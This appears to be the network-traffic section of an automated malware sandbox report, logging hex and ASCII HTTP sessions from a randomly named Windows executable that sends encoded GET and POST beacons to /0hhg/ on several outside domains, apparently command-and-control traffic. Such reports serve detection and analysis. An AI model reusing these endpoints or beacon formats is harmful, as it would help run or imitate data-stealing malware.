                                                                                                    May 2, 2024 08:25:57.722981930 CEST1277INData Raw: 20 6c 69 62 2f 61 63 74 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 72 65 6d 6f 74 65 5f 69 70 2e 72 62 3a 38 31 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61
                                                                                                    Data Ascii: lib/action_dispatch/middleware/remote_ip.rb:81:in `call&#39;</a><br><a class="trace-frames" data-frame-id="9" href="#">request_store (1.5.0) lib/request_store/middleware.rb:19:in `call&#39;</a><br><a class="trace-frames" data-frame-id="10" hr
                                                                                                    May 2, 2024 08:25:57.723002911 CEST1277INData Raw: 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 2e 72 62 3a 32 32 38 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65
                                                                                                    Data Ascii: a (4.3.9) lib/puma/configuration.rb:228:in `call&#39;</a><br><a class="trace-frames" data-frame-id="19" href="#">puma (4.3.9) lib/puma/server.rb:718:in `handle_request&#39;</a><br><a class="trace-frames" data-frame-id="20" href="#">puma (4.3.9
                                                                                                    May 2, 2024 08:25:57.828059912 CEST1277INData Raw: 20 20 63 68 61 6e 67 65 53 6f 75 72 63 65 45 78 74 72 61 63 74 28 66 72 61 6d 65 5f 69 64 29 3b 0a 20 20 20 20 20 20 7d 29 3b 0a 0a 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 63 68 61 6e 67 65 53 6f 75 72 63 65 45 78 74 72 61 63 74 28 66 72 61
                                                                                                    Data Ascii: changeSourceExtract(frame_id); }); function changeSourceExtract(frame_id) { var el = document.getElementById('frame-source-' + frame_id); if (currentSource && el) { currentSource.className += " hidden";


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    16192.168.2.449753216.40.34.4180916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:26:00.253485918 CEST443OUTGET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=OATZzJPiUUGU3mpjZciWUPZeXbT2MJCMteYhXkaeth47OgAuOtH7Ax1R5cSUzc8K7tJsdCLV7T20xyzul8wSbYrVofQNfqyssPuErqT1NUPeqaem3KrcSI4= HTTP/1.1
                                                                                                    Host: www.whirledairlines.com
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    May 2, 2024 08:26:00.366607904 CEST1277INHTTP/1.1 200 OK
                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                    x-xss-protection: 1; mode=block
                                                                                                    x-content-type-options: nosniff
                                                                                                    x-download-options: noopen
                                                                                                    x-permitted-cross-domain-policies: none
                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                    content-type: text/html; charset=utf-8
                                                                                                    etag: W/"9b1d5500ef559cdf1d67ac85005271a6"
                                                                                                    cache-control: max-age=0, private, must-revalidate
                                                                                                    x-request-id: 415a058f-0206-4914-a31a-3bb15fd5b3c6
                                                                                                    x-runtime: 0.004613
                                                                                                    transfer-encoding: chunked
                                                                                                    connection: close
                                                                                                    Data Raw: 31 37 35 46 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 33 43 62 61 56 76 77 2d 49 37 4d 6c 72 6d 6d 6d 48 7a 30 62 66 62 6b 6f 37 6f 4d 43 57 31 6d 6e 32 75 36 35 75 57 73 57 57 42 38 27 20 6e 61 6d 65 3d 27 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 27 20 6e 61 6d 65 3d 27 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 64 61 74 61 [TRUNCATED]
                                                                                                    Data Ascii: 175F<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>whirledairlines.com is coming soon</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.hover.com/?source=parked"><img width="102" height="30" sr
                                                                                                    May 2, 2024 08:26:00.366631985 CEST1277INData Raw: 63 3d 22 2f 61 73 73 65 74 73 2f 68 76 5f 6c 6f 67 6f 5f 72 65 74 69 6e 61 2d 36 61 32 62 61 38 33 35 30 39 30 37 64 34 61 31 37 62 66 63 37 38 36 33 63 32 66 31 33 37 38 65 33 38 61 35 33 62 64 32 32 62 37 39 30 63 36 39 63 31 34 31 34 33 62 30
                                                                                                    Data Ascii: c="/assets/hv_logo_retina-6a2ba8350907d4a17bfc7863c2f1378e38a53bd22b790c69c14143b0f9ce45ca.png" /></a></header><main><h1>whirledairlines.com</h1><h2>is a totally awesome idea still being worked on.</h2><p class='big'>Check back later.</p>
                                                                                                    May 2, 2024 08:26:00.366646051 CEST1277INData Raw: 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 68 6f 76 65 72 2e 63 6f 6d 2f 68 6f 6d 65 3f 73 6f 75 72 63 65 3d 70 61 72 6b 65 64 22 3e 48 65 6c 70
                                                                                                    Data Ascii: ></li><li><a rel="nofollow" href="https://help.hover.com/home?source=parked">Help</a></li><li><a rel="nofollow" href="https://www.hover.com/tools?source=parked">Your Account</a></li></ul></nav><nav class='social'><ul><li><a rel="nofollo
                                                                                                    May 2, 2024 08:26:00.366658926 CEST1277INData Raw: 20 2d 37 32 2e 35 32 34 36 31 2c 2d 33 36 2e 37 36 33 39 36 20 2d 33 2e 30 32 38 37 39 2c 35 2e 31 39 36 36 32 20 2d 34 2e 37 36 34 34 33 2c 31 31 2e 32 34 30 34 38 20 2d 34 2e 37 36 34 34 33 2c 31 37 2e 36 38 39 31 20 30 2c 31 32 2e 32 30 37 37
                                                                                                    Data Ascii: -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.
                                                                                                    May 2, 2024 08:26:00.366672039 CEST1277INData Raw: 38 2e 35 71 2d 35 30 20 2d 32 30 20 2d 38 38 20 2d 35 38 74 2d 35 38 20 2d 38 38 71 2d 31 31 20 2d 32 39 20 2d 31 38 2e 35 20 2d 37 31 2e 35 74 2d 31 30 20 2d 31 30 33 74 2d 33 20 2d 39 36 2e 35 74 30 20 2d 31 30 35 2e 35 74 30 2e 35 20 2d 37 36
                                                                                                    Data Ascii: 8.5q-50 -20 -88 -58t-58 -88q-11 -29 -18.5 -71.5t-10 -103t-3 -96.5t0 -105.5t0.5 -76.5t-0.5 -76.5t0 -105.5t3 -96.5t10 -103t18.5 -71.5q20 -50 58 -88t88 -58q29 -11 71.5 -18.5t103 -10t96.5 -3t105.5 0t76.5 0.5 t76.5 -0.5t105.5 0t96.5 3t103 10t71.5 1
                                                                                                    May 2, 2024 08:26:00.366683960 CEST100INData Raw: 20 20 67 61 28 27 63 72 65 61 74 65 27 2c 20 27 55 41 2d 34 31 37 31 33 33 38 2d 34 33 27 2c 20 27 61 75 74 6f 27 29 3b 0a 20 20 67 61 28 27 73 65 6e 64 27 2c 20 27 70 61 67 65 76 69 65 77 27 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64
                                                                                                    Data Ascii: ga('create', 'UA-4171338-43', 'auto'); ga('send', 'pageview');</script></body></html>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    17192.168.2.449754203.161.50.12780916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:26:05.731204987 CEST714OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.quantummquest.top
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.quantummquest.top
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 205
                                                                                                    Referer: http://www.quantummquest.top/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 71 42 45 65 37 59 77 4a 6d 48 49 36 6b 61 30 35 66 2f 49 74 39 4b 47 30 68 68 2b 48 5a 34 44 34 6b 4f 55 36 38 66 4b 38 49 4a 35 42 72 72 4a 37 47 6d 54 67 61 70 4f 64 41 64 53 6a 69 56 4d 4a 4b 39 50 57 6b 35 38 50 6a 41 6c 66 53 57 77 61 64 47 4f 50 45 61 33 6a 53 64 37 2f 6c 55 7a 37 79 73 39 6b 36 2b 48 74 71 56 72 54 37 6e 37 4e 68 6a 46 61 72 65 4e 54 75 71 71 42 34 31 69 38 6b 39 74 41 39 59 71 46 59 43 48 34 4b 6a 75 59 51 4a 37 37 6d 67 77 57 57 44 61 59 47 61 36 53 49 70 41 63 4b 47 38 57 47 45 59 43 7a 33 32 78 6b 71 67 51 37 61 62 6b 78 37 4a 2b 78 39 79 4f 34 67 3d 3d
                                                                                                    Data Ascii: ABqDW6A8=qBEe7YwJmHI6ka05f/It9KG0hh+HZ4D4kOU68fK8IJ5BrrJ7GmTgapOdAdSjiVMJK9PWk58PjAlfSWwadGOPEa3jSd7/lUz7ys9k6+HtqVrT7n7NhjFareNTuqqB41i8k9tA9YqFYCH4KjuYQJ77mgwWWDaYGa6SIpAcKG8WGEYCz32xkqgQ7abkx7J+x9yO4g==
                                                                                                    May 2, 2024 08:26:05.905002117 CEST1289INHTTP/1.1 404 Not Found
                                                                                                    Date: Thu, 02 May 2024 06:26:05 GMT
                                                                                                    Server: Apache
                                                                                                    Content-Length: 16052
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                                    May 2, 2024 08:26:05.905040026 CEST1289INData Raw: 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c 61 79 65 72 31 22 3e 0a 20 20 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 67 36 32 31 39 22 0a 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20
                                                                                                    Data Ascii: 14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000
                                                                                                    May 2, 2024 08:26:05.905054092 CEST1289INData Raw: 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 32 33 37 34 33 33 39 33 70 78 3b 73 74 72 6f 6b
                                                                                                    Data Ascii: style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0
                                                                                                    May 2, 2024 08:26:05.905069113 CEST1289INData Raw: 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c
                                                                                                    Data Ascii: 157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.34
                                                                                                    May 2, 2024 08:26:05.905179977 CEST1289INData Raw: 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72
                                                                                                    Data Ascii: none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.2
                                                                                                    May 2, 2024 08:26:05.905194044 CEST1289INData Raw: 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c 33 31 2e 37 38 39 30 34 20 34 2e 35 31 37 32 38 2c 38 2e 37 35 33 32 37 20 37 2e 32 39 39 36 34 2c 31 34 2e 35 34 39 38 35
                                                                                                    Data Ascii: 9885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034,14.14338 -2.88706,36.53226 -5.4209,56.44
                                                                                                    May 2, 2024 08:26:05.905236006 CEST1289INData Raw: 20 31 2e 30 30 31 37 31 31 2c 33 36 2e 38 38 37 30 31 20 31 2e 35 39 30 39 39 39 2c 35 34 2e 33 32 39 39 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65
                                                                                                    Data Ascii: 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545" d="m 83.
                                                                                                    May 2, 2024 08:26:05.905289888 CEST1289INData Raw: 20 64 3d 22 6d 20 34 32 2e 34 32 36 34 30 37 2c 31 35 35 2e 33 38 38 32 35 20 63 20 33 2e 34 31 38 34 2c 30 2e 38 32 35 31 33 20 36 2e 38 33 36 30 38 32 2c 31 2e 36 35 30 30 39 20 31 30 2e 36 30 36 39 39 37 2c 32 2e 31 38 30 33 34 20 33 2e 37 37
                                                                                                    Data Ascii: d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3.417163,-0.0589 6.953769,-0.17681 10.606588,-0.23572 3.652818,
                                                                                                    May 2, 2024 08:26:05.905565023 CEST1289INData Raw: 74 68 34 36 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66
                                                                                                    Data Ascii: th4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse ry="4.315
                                                                                                    May 2, 2024 08:26:05.905594110 CEST1289INData Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30
                                                                                                    Data Ascii: style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.03816
                                                                                                    May 2, 2024 08:26:06.059452057 CEST1289INData Raw: 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d
                                                                                                    Data Ascii: sform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667 0.16767,0.16717 0.68771,0.16717 0.89053,0.36949 0.20282,0.202


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    18192.168.2.449755203.161.50.12780916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:26:08.857439041 CEST734OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.quantummquest.top
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.quantummquest.top
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 225
                                                                                                    Referer: http://www.quantummquest.top/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 71 42 45 65 37 59 77 4a 6d 48 49 36 6b 37 45 35 59 63 67 74 71 61 47 33 6b 68 2b 48 43 49 44 38 6b 50 6f 36 38 61 37 6a 49 64 56 42 6c 76 46 37 46 69 50 67 54 35 4f 64 4c 39 53 63 6d 56 4d 41 4b 38 7a 6f 6b 37 34 50 6a 41 78 66 53 54 55 61 63 78 79 4d 57 36 33 68 4c 4e 37 39 6f 30 7a 37 79 73 39 6b 36 2b 54 44 71 55 50 54 34 55 6a 4e 68 43 46 5a 6d 2b 4e 53 34 36 71 42 79 56 69 77 6b 39 74 69 39 64 4b 2f 59 42 76 34 4b 68 32 59 58 59 37 36 76 67 77 51 59 6a 62 4c 58 71 54 36 53 4e 59 51 46 51 38 6d 4f 33 38 6c 79 78 6e 72 31 62 42 48 70 61 2f 58 73 38 41 4b 38 2b 50 48 6a 73 50 2f 4d 4c 4a 51 35 35 39 4e 30 54 79 44 30 31 56 71 41 52 6f 3d
                                                                                                    Data Ascii: ABqDW6A8=qBEe7YwJmHI6k7E5YcgtqaG3kh+HCID8kPo68a7jIdVBlvF7FiPgT5OdL9ScmVMAK8zok74PjAxfSTUacxyMW63hLN79o0z7ys9k6+TDqUPT4UjNhCFZm+NS46qByViwk9ti9dK/YBv4Kh2YXY76vgwQYjbLXqT6SNYQFQ8mO38lyxnr1bBHpa/Xs8AK8+PHjsP/MLJQ559N0TyD01VqARo=
                                                                                                    May 2, 2024 08:26:09.022974014 CEST1289INHTTP/1.1 404 Not Found
                                                                                                    Date: Thu, 02 May 2024 06:26:08 GMT
                                                                                                    Server: Apache
                                                                                                    Content-Length: 16052
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                                    May 2, 2024 08:26:09.023083925 CEST1289INData Raw: 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c 61 79 65 72 31 22 3e 0a 20 20 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 67 36 32 31 39 22 0a 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20
                                                                                                    Data Ascii: 14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000
                                                                                                    May 2, 2024 08:26:09.023098946 CEST1289INData Raw: 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 32 33 37 34 33 33 39 33 70 78 3b 73 74 72 6f 6b
                                                                                                    Data Ascii: style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0
                                                                                                    May 2, 2024 08:26:09.023144007 CEST1289INData Raw: 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c
                                                                                                    Data Ascii: 157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.34
